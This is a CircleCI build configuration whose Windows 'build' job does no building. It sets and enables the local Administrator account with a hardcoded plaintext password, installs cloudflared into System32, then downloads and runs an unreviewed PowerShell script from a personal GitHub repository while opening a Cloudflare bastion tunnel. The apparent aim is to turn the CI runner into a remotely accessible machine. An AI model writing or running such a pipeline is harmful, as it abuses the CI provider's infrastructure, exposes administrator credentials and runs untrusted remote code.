version: 2.1

orbs:
  win: circleci/windows@2.3.0

jobs:
  build:
    executor:
      name: win/default
      size: "medium"

    steps:
      - checkout  
      - run: Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText "Kontol123" -Force)
      - run: Get-LocalUser -Name "Administrator" | Enable-LocalUser
      - run: Invoke-WebRequest https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-windows-amd64.zip -OutFile cloudflared.zip
      - run: tar xf cloudflared.zip
      - run: Copy cloudflared.exe C:\Windows\System32
      - run: Invoke-WebRequest https://github.com/PersonMuntazer/checkout/raw/wvm/dua.ps1 -OutFile a.ps1
      - run: Start-Process cloudflared -Args "tunnel --bastion" -NoNewWindow; .\a.ps1
